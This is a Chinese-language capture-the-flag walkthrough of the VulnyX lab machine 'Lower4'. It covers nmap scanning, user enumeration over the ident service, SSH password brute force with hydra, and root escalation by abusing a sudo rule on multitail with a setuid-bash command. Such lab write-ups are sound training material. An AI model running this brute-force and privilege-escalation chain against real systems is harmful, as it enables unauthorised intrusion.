Vlx_Lower4

靶机来源： https://vulnyx.com/

难度：Low

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-17 16:51 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00049s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.0028s latency).
MAC Address: 08:00:27:8D:05:1E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.90
Host is up (0.00065s latency).
MAC Address: 08:00:27:D6:A4:0C (Oracle VirtualBox virtual NIC)
Stats: 0:00:05 elapsed; 255 hosts completed (3 up), 255 undergoing Host Discovery
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.53 seconds

靶机IP：192.168.2.90

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.90                   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-17 16:51 +0800
Nmap scan report for 192.168.2.90
Host is up (0.0017s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
113/tcp open  ident
MAC Address: 08:00:27:D6:A4:0C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 33.10 seconds

开放端口：22、80、113

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80,113 192.168.2.90
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-17 16:52 +0800
Nmap scan report for 192.168.2.90
Host is up (0.0011s latency).

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
|_auth-owners: root
80/tcp  open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
113/tcp open  ident?
|_auth-owners: lucifer
MAC Address: 08:00:27:D6:A4:0C (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.14 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.90                        
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-17 16:53 +0800
Nmap scan report for 192.168.2.90
Host is up (0.0020s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:D6:A4:0C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 115.01 seconds

二、WEB渗透

1、80端口

Apache的默认页面

2、目录扫描

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.90 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.90
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              php,html,js,txt,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html           (Status: 200) [Size: 10701]
server-status        (Status: 403) [Size: 277]

三、TCP113_Ident协议

Ident协议用于通过互联网将TCP连接与特定用户关联。最初设计用于帮助网络管理和安全，它通过允许服务器在113端口查询客户端以请求有关特定TCP连接用户的信息来操作。

使用nmap的脚本扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --script=auth-owners 192.168.2.90
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-17 16:58 +0800
Nmap scan report for 192.168.2.90
Host is up (0.00040s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
|_auth-owners: root
80/tcp  open  http
113/tcp open  ident
|_auth-owners: lucifer
MAC Address: 08:00:27:D6:A4:0C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.02 seconds

找到一个用户lucifer

四、SSH_Bruf

使用hydra对ssh进行爆破

┌──(root㉿kali)-[~/miaosec]
└─# hydra -t 4 -l lucifer -P /usr/share/wordlists/rockyou.txt ssh://192.168.2.90 -F -I
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-17 16:56:53
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://192.168.2.90:22/
[STATUS] 72.00 tries/min, 72 tries in 00:01h, 14344327 to do in 3320:27h, 4 active
[STATUS] 68.33 tries/min, 205 tries in 00:03h, 14344194 to do in 3498:36h, 4 active
[22][ssh] host: 192.168.2.90   login: lucifer   password: 789456123
[STATUS] attack finished for 192.168.2.90 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-17 17:01:10

成功找到凭证：lucifer:789456123

五、获取Lucifer权限

┌──(root㉿kali)-[~/miaosec]
└─# ssh lucifer@192.168.2.90
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
lucifer@192.168.2.90's password: 
-bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
lucifer@lower4:~$ id
uid=1000(lucifer) gid=1000(lucifer) groups=1000(lucifer)

六、权限提升

查看sudo -l

lucifer@lower4:~$ sudo -l
Matching Defaults entries for lucifer on lower4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lucifer may run the following commands on lower4:
    (root) NOPASSWD: /usr/bin/multitail

直接提权

lucifer@lower4:~$ sudo /usr/bin/multitail -l "chmod +s /bin/bash"
lucifer@lower4:~$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1234376 Mar 27  2022 /bin/bash

成功获取到root权限

lucifer@lower4:~$ /bin/bash -p
bash-5.1# id
uid=1000(lucifer) gid=1000(lucifer) euid=0(root) egid=0(root) groups=0(root),1000(lucifer)

七、查看FLAG

bash-5.1# cat /root/root.txt /home/lucifer/user.txt 
c07db370f9e16dcde97d554b38c9c08e
8e99e9f5a7d2d7a067314e34d9fd957f